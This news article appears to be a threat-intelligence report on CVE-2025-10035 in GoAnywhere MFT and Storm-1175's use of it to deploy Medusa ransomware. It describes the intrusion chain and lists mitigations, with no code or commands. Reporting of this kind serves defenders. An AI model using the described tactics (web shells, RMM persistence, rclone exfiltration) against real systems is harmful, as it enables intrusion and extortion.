A critical deserialization flaw in GoAnywhere MFT’s License Servlet, tracked as CVE-2025-10035, has already been weaponized by the Storm-1175 group to execute the Medusa ransomware.
The vulnerability affects GoAnywhere MFT versions up to 7.8.3. It resides in the License Servlet Admin Console, where a threat actor can forge a license response signature and bypass validation checks.
By deserializing an attacker-controlled object, the actor gains the ability to inject arbitrary commands into the Java process, ultimately leading to full remote code execution on internet-exposed instances.
Deserialization Flaw (CVE-2025-10035)
The flaw does not require authentication once a validly signed payload is crafted or intercepted, making exploitation trivially achievable against unpatched systems.
Successful attacks allow system and user enumeration, long-term persistence, and deployment of additional tools to facilitate lateral movement and data exfiltration.
Immediate patching is paramount; administrators must upgrade to the versions specified in Fortra’s advisory to remediate the issue and audit any potentially compromised environments.
Microsoft Threat Intelligence has attributed active exploitation to Storm-1175, a ransomware group notorious for targeting public-facing applications.
Initial access is gained through the newly disclosed deserialization bug in GoAnywhere MFT.
After seizing control, Storm-1175 drops RMM binaries, specifically MeshAgent and SimpleHelp, into the GoAnywhere service directory. Concurrently, malicious JSP web shells are created to facilitate stealthy remote access.
Post-exploitation, the actors run PowerShell commands to enumerate local users, groups, domain trust relationships, and network interfaces.
Command and control channels are established via the RMM tools, often tunneled through Cloudflare to evade detection.
Exfiltration is executed using rclone, with stolen data transferred to attacker-controlled cloud storage. The final stage involves encrypting victim assets with Medusa ransomware, flagged by Microsoft Defender as Ransom Win32/Medusa.
| Risk Factors | Details |
| Affected Products | GoAnywhere MFT License Servlet Admin Console lesser than 7.8.3 |
| Impact | Command injection leading to RCE |
| Exploit Prerequisites | Validly forged or intercepted license response signature |
| CVSS 3.1 Score | 10.0 (Critical) |
Mitigations
Upgrade immediately to the patched GoAnywhere MFT release as per Fortra instructions.
Configure perimeter firewalls and proxies to block outbound connections from GoAnywhere servers unless explicitly approved.
Enable EDR in Block Mode to allow Microsoft Defender for Endpoint to block malicious artifacts even under passive AV conditions.
Deploy Attack Surface Reduction Rules to prevent common ransomware TTPs, such as blocking executable files that do not meet age or prevalence criteria and disabling web shell creation.
Monitor with External Attack Surface Management tools to identify unmanaged or unpatched GoAnywhere instances.
Leverage Automated Investigations and remediation features in Microsoft Defender to reduce dwell time and alert fatigue.
By adopting a defense-in-depth posture combining rapid patching, network segmentation, and advanced endpoint protection, organizations can thwart exploitation attempts and prevent Storm 1175 Medusa ransomware from taking hold.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
